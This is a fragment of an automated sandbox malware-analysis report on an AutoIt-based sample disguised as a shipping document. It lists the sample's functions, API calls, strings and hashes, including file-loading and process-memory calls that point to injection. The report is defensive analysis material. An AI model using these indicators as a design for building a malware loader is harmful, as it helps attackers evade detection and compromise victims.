                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                    • String ID: TaskbarCreated$%
                    • API String ID: 129472671-3835587964
                    • Opcode ID: 417bea75c48fb2625bcdf76170970ab0df87d5029cc79e1b3e5cd68c47ae0aaf
                    • Instruction ID: d18264378a9d8a23cb2edd09913742f7d9859e35a9a263f25dd21c9ba6cdcf51
                    • Opcode Fuzzy Hash: 417bea75c48fb2625bcdf76170970ab0df87d5029cc79e1b3e5cd68c47ae0aaf
                    • Instruction Fuzzy Hash: 954109B3214505AFDB189B78FD09FBA369CE740300F14213AF601B62E2CA63A9D59361
                    Function 00E03A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00E03A62
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00E03A71
                    • LoadIconW.USER32(00000063), ref: 00E03A88
                    • LoadIconW.USER32(000000A4), ref: 00E03A9A
                    • LoadIconW.USER32(000000A2), ref: 00E03AAC
                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E03AD2
                    • RegisterClassExW.USER32(?), ref: 00E03B28
                      • Part of subcall function 00E03041: GetSysColorBrush.USER32(0000000F), ref: 00E03074
                      • Part of subcall function 00E03041: RegisterClassExW.USER32(00000030), ref: 00E0309E
                      • Part of subcall function 00E03041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E030AF
                      • Part of subcall function 00E03041: InitCommonControlsEx.COMCTL32(?), ref: 00E030CC
                      • Part of subcall function 00E03041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E030DC
                      • Part of subcall function 00E03041: LoadIconW.USER32(000000A9), ref: 00E030F2
                      • Part of subcall function 00E03041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E03101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                    • String ID: #$0$AutoIt v3
                    • API String ID: 423443420-4155596026
                    • Opcode ID: 114d3048383c00c8d65d92987d6b69b2e08a0b7a1fa04f1b4fe4207d7085ffa5
                    • Instruction ID: e37de65b58f8abdfbec1ceda08f8ef19de38e98558dd7ca8fa4daf40fcb9174f
                    • Opcode Fuzzy Hash: 114d3048383c00c8d65d92987d6b69b2e08a0b7a1fa04f1b4fe4207d7085ffa5
                    • Instruction Fuzzy Hash: D621F772910304AFEB14DFA6EC09B9D7BF4EB08711F10412AF504B62B1D7B666998F94
                    Function 00E03778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                    Download Yara Rule

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R
                    • API String ID: 1825951767-347772802
                    • Opcode ID: 5da5bbc4c0d03c0aae8705f36eb3621681fe92e52e1b450d2cca7d61ba23266e
                    • Instruction ID: d4ff06f3abe81c29fc3cd7deee08561bd5805e64b6ba0a294f44f1cf1360ac8b
                    • Opcode Fuzzy Hash: 5da5bbc4c0d03c0aae8705f36eb3621681fe92e52e1b450d2cca7d61ba23266e
                    • Instruction Fuzzy Hash: DBA171729102199ACB14EFA0DC91EEEB7FCBF14300F54252AF416B71D2DB756A89CB60
                    Function 00E0F8CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00E202E2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E20313
                      • Part of subcall function 00E202E2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E2031B
                      • Part of subcall function 00E202E2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E20326
                      • Part of subcall function 00E202E2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E20331
                      • Part of subcall function 00E202E2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E20339
                      • Part of subcall function 00E202E2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E20341
                      • Part of subcall function 00E16259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00E0FA90), ref: 00E162B4
                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E0FB2D
                    • OleInitialize.OLE32(00000000), ref: 00E0FBAA
                    • CloseHandle.KERNEL32(00000000), ref: 00E44921
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                    • String ID: <W$\T$%$S
                    • API String ID: 1986988660-191198415
                    • Opcode ID: b8d73c6a978317d2cbaa6a23d20abb6c6787e0452beb8eae8c23e4c510884234
                    • Instruction ID: 0c6b7030e722212ce3f861013d703c784ae484e68d147eeef8cc3450d5c056b9
                    • Opcode Fuzzy Hash: b8d73c6a978317d2cbaa6a23d20abb6c6787e0452beb8eae8c23e4c510884234
                    • Instruction Fuzzy Hash: 4C81B2B2901B40CFC388DF2AA945E597BE5BB98346350513ED42AF7261EB7264CBCF10
                    Function 00FE9DD8 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 993 fe9dd8-fe9e86 call fe77e8 996 fe9e8d-fe9eb3 call feace8 CreateFileW 993->996 999 fe9eba-fe9eca 996->999 1000 fe9eb5 996->1000 1007 fe9ecc 999->1007 1008 fe9ed1-fe9eeb VirtualAlloc 999->1008 1001 fea005-fea009 1000->1001 1003 fea04b-fea04e 1001->1003 1004 fea00b-fea00f 1001->1004 1009 fea051-fea058 1003->1009 1005 fea01b-fea01f 1004->1005 1006 fea011-fea014 1004->1006 1010 fea02f-fea033 1005->1010 1011 fea021-fea02b 1005->1011 1006->1005 1007->1001 1012 fe9eed 1008->1012 1013 fe9ef2-fe9f09 ReadFile 1008->1013 1014 fea0ad-fea0c2 1009->1014 1015 fea05a-fea065 1009->1015 1018 fea035-fea03f 1010->1018 1019 fea043 1010->1019 1011->1010 1012->1001 1020 fe9f0b 1013->1020 1021 fe9f10-fe9f50 VirtualAlloc 1013->1021 1016 fea0c4-fea0cf VirtualFree 1014->1016 1017 fea0d2-fea0da 1014->1017 1022 fea069-fea075 1015->1022 1023 fea067 1015->1023 1016->1017 1018->1019 1019->1003 1020->1001 1024 fe9f57-fe9f72 call feaf38 1021->1024 1025 fe9f52 1021->1025 1026 fea089-fea095 1022->1026 1027 fea077-fea087 1022->1027 1023->1014 1033 fe9f7d-fe9f87 1024->1033 1025->1001 1029 fea097-fea0a0 1026->1029 1030 fea0a2-fea0a8 1026->1030 1028 fea0ab 1027->1028 1028->1009 1029->1028 1030->1028 1034 fe9fba-fe9fce call fead48 1033->1034 1035 fe9f89-fe9fb8 call feaf38 1033->1035 1041 fe9fd2-fe9fd6 1034->1041 1042 fe9fd0 1034->1042 1035->1033 1043 fe9fd8-fe9fdc CloseHandle 1041->1043 1044 fe9fe2-fe9fe6 1041->1044 1042->1001 1043->1044 1045 fe9fe8-fe9ff3 VirtualFree 1044->1045 1046 fe9ff6-fe9fff 1044->1046 1045->1046 1046->996 1046->1001
                    APIs
                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00FE9EA9
                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FEA0CF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711546126.0000000000FE7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FE7000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_fe7000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CreateFileFreeVirtual
                    • String ID:
                    • API String ID: 204039940-0
                    • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                    • Instruction ID: b99eabbc8180d1a70b190c2fbc03746a4e6f7802c4a3127daadb2e00a4c917d0
                    • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                    • Instruction Fuzzy Hash: 7AA12871E04249EBDB14CFA5C888BEEB7B5FF48314F208559E211BB280D775AA40DF61
                    Function 00E039E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1114 e039e7-e03a57 CreateWindowExW * 2 ShowWindow * 2
                    APIs
                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E03A15
                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E03A36
                    • ShowWindow.USER32(00000000,?,?), ref: 00E03A4A
                    • ShowWindow.USER32(00000000,?,?), ref: 00E03A53
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$CreateShow
                    • String ID: AutoIt v3$edit
                    • API String ID: 1584632944-3779509399
                    • Opcode ID: ad4a961119ebd6bdb1229390d6cbcea1ca6d40ae2a127df0cfbef24d416bd14f
                    • Instruction ID: 0479a126abba4d8ffe7be4fd4c6a95d4f69d7c190c43a64db7690fc4e963f133
                    • Opcode Fuzzy Hash: ad4a961119ebd6bdb1229390d6cbcea1ca6d40ae2a127df0cfbef24d416bd14f
                    • Instruction Fuzzy Hash: 01F0DA725416907EEB355727AC49E6B2EBDD7C6F50B00413EF908B2170C6762896DAB0
                    Function 00FE9B98 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 150fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1467 fe9b98-fe9cd8 call fe77e8 call fe9a88 CreateFileW 1474 fe9cdf-fe9cef 1467->1474 1475 fe9cda 1467->1475 1478 fe9cf6-fe9d10 VirtualAlloc 1474->1478 1479 fe9cf1 1474->1479 1476 fe9d8f-fe9d94 1475->1476 1480 fe9d14-fe9d2b ReadFile 1478->1480 1481 fe9d12 1478->1481 1479->1476 1482 fe9d2f-fe9d69 call fe9ac8 call fe8a88 1480->1482 1483 fe9d2d 1480->1483 1481->1476 1488 fe9d6b-fe9d80 call fe9b18 1482->1488 1489 fe9d85-fe9d8d ExitProcess 1482->1489 1483->1476 1488->1489 1489->1476
                    APIs
                      • Part of subcall function 00FE9A88: Sleep.KERNELBASE(000001F4), ref: 00FE9A99
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00FE9CCE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711546126.0000000000FE7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FE7000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_fe7000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CreateFileSleep
                    • String ID: YWF3ZQY1TECX8A2F1HBNKNWLM4WE
                    • API String ID: 2694422964-963838094
                    • Opcode ID: bae94e84dd0134068d9d1811cde04637b07c985f1008a71cd7c4dabf876a5175
                    • Instruction ID: 8d8ff7ac05d6da57ce77240d807c6f3cf9ee3a37e11fd8527fc5919991642db2
                    • Opcode Fuzzy Hash: bae94e84dd0134068d9d1811cde04637b07c985f1008a71cd7c4dabf876a5175
                    • Instruction Fuzzy Hash: 93519431D08288DAEF11D7F8C848BDEBBB4AF55304F144199E6487B2C1C6B90B49CBB5
                    Function 00E0410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1491 e0410d-e04123 1492 e04200-e04204 1491->1492 1493 e04129-e0413e call e07b76 1491->1493 1496 e04144-e04164 call e07d2c 1493->1496 1497 e3d50d-e3d51c LoadStringW 1493->1497 1500 e3d527-e3d53f call e07c8e call e07143 1496->1500 1501 e0416a-e0416e 1496->1501 1497->1500 1510 e0417e-e041fb call e22f60 call e0463e call e22f3c Shell_NotifyIconW call e05a64 1500->1510 1513 e3d545-e3d563 call e07e0b call e07143 call e07e0b 1500->1513 1503 e04174-e04179 call e07c8e 1501->1503 1504 e04205-e0420e call e081a7 1501->1504 1503->1510 1504->1510 1510->1492 1513->1510
                    APIs
                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E3D51C
                      • Part of subcall function 00E07D2C: _memmove.LIBCMT ref: 00E07D66
                    • _memset.LIBCMT ref: 00E0418D
                    • _wcscpy.LIBCMT ref: 00E041E1
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E041F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                    • String ID: Line:
                    • API String ID: 3942752672-1585850449
                    • Opcode ID: 4d791857d947747e7c5ce71b7f892696f3e17b989ef187b48dbd7acb5fe2e191
                    • Instruction ID: 7829cefa5364eb630fff276cd867fbab96edb46b78270e0e46e57df9e190b5a5
                    • Opcode Fuzzy Hash: 4d791857d947747e7c5ce71b7f892696f3e17b989ef187b48dbd7acb5fe2e191
                    • Instruction Fuzzy Hash: C131CFB2409304AED325EBA0DD45FDB77E8AF44304F10552EF294B20E1EB70A6C9CB92
                    Function 00E069CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E04F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00EC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E04F6F
                    • _free.LIBCMT ref: 00E3E5BC
                    • _free.LIBCMT ref: 00E3E603
                      • Part of subcall function 00E06BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E06D0D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _free$CurrentDirectoryLibraryLoad
                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                    • API String ID: 2861923089-1757145024
                    • Opcode ID: 4785df7550e8644df5ef5da6e9d47c1746714b6bc50b5b1cf075ad732ab1563e
                    • Instruction ID: 4c09cbf8f64d422bd37f475d0c106d1cb61ff32ba60bee020a55168bb2a729c9
                    • Opcode Fuzzy Hash: 4785df7550e8644df5ef5da6e9d47c1746714b6bc50b5b1cf075ad732ab1563e
                    • Instruction Fuzzy Hash: 2C915C71A10219AFCF14EFA4D8959EDBBB4FF08314F14646AF815BB2E1EB30A945CB50
                    Function 00E035B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00E035A1,SwapMouseButtons,00000004,?), ref: 00E035D4
                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00E035A1,SwapMouseButtons,00000004,?,?,?,?,00E02754), ref: 00E035F5
                    • RegCloseKey.KERNELBASE(00000000,?,?,00E035A1,SwapMouseButtons,00000004,?,?,?,?,00E02754), ref: 00E03617
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: Control Panel\Mouse
                    • API String ID: 3677997916-824357125
                    • Opcode ID: a52133278c297e70007e502c9e9a6a06f44d8edc1a97b3d846124192c60d125a
                    • Instruction ID: c9434271407363e0fde87fcafb8e679271f678304c5e6708ed28de990b04d98d
                    • Opcode Fuzzy Hash: a52133278c297e70007e502c9e9a6a06f44d8edc1a97b3d846124192c60d125a
                    • Instruction Fuzzy Hash: 4F114871510208BFDB20CF65EC409EEB7BCEF14744F1054A9E809E7250D6729E849760
                    Function 00FE8A88 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00FE9243
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00FE92D9
                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00FE92FB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711546126.0000000000FE7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FE7000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_fe7000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                    • Instruction ID: 17fd1bf61a3db9caefa27467636a3ce6adb9c2d92cc4ec412b002b5b5e39edea
                    • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                    • Instruction Fuzzy Hash: 9A620C70A14258DBEB24CFA5C841BDEB376EF58300F1091A9D10DEB390E7B99E81DB59
                    Function 00E69604 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E05045: _fseek.LIBCMT ref: 00E0505D
                      • Part of subcall function 00E697DD: _wcscmp.LIBCMT ref: 00E698CD
                      • Part of subcall function 00E697DD: _wcscmp.LIBCMT ref: 00E698E0
                    • _free.LIBCMT ref: 00E6974B
                    • _free.LIBCMT ref: 00E69752
                    • _free.LIBCMT ref: 00E697BD
                      • Part of subcall function 00E22ED5: RtlFreeHeap.NTDLL(00000000,00000000,?,00E29BA4), ref: 00E22EE9
                      • Part of subcall function 00E22ED5: GetLastError.KERNEL32(00000000,?,00E29BA4), ref: 00E22EFB
                    • _free.LIBCMT ref: 00E697C5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                    • String ID:
                    • API String ID: 1552873950-0
                    • Opcode ID: e04109606b965776ed5639af7f9fd1c9ba74d58510194298a21feaccf490b595
                    • Instruction ID: b730e79a7fc1356c3b47a232d1904d2796dc9c992e8891967c58a5f418883926
                    • Opcode Fuzzy Hash: e04109606b965776ed5639af7f9fd1c9ba74d58510194298a21feaccf490b595
                    • Instruction Fuzzy Hash: 4A5150B1904219AFDF249F64DC85A9EBBB9EF48304F10149EF609B7241DB715980CF58
                    Function 00E2487A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                    • String ID:
                    • API String ID: 2782032738-0
                    • Opcode ID: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
                    • Instruction ID: 9d09b5f1be10113f055edcba11b84d42133a96407578f6593ff1dfebf509b5eb
                    • Opcode Fuzzy Hash: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
                    • Instruction Fuzzy Hash: 574106B070476A9BDB1CCF69E8809AF77E5AF84364B24953DF445E76C0D670DD808B40
                    Function 00E04DD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: AU3!P/$EA06
                    • API String ID: 4104443479-182974850
                    • Opcode ID: f6bf0030e55389ed46573c917291b7c960cfdaa2c40a3d168e0b5177e0d61c96
                    • Instruction ID: 482f4d7d696fcccc0f006783a90561857f4ce8d59d98d000058cdd473772b15c
                    • Opcode Fuzzy Hash: f6bf0030e55389ed46573c917291b7c960cfdaa2c40a3d168e0b5177e0d61c96
                    • Instruction Fuzzy Hash: A0415BE2A041585BCF218B64CA51BFF7FA5AB45304F287079EA46BF1C2C5219DC687A1
                    Function 00E073E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00E3ED92
                    • GetOpenFileNameW.COMDLG32(?), ref: 00E3EDDC
                      • Part of subcall function 00E048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E048A1,?,?,00E037C0,?), ref: 00E048CE
                      • Part of subcall function 00E20911: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E20930
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
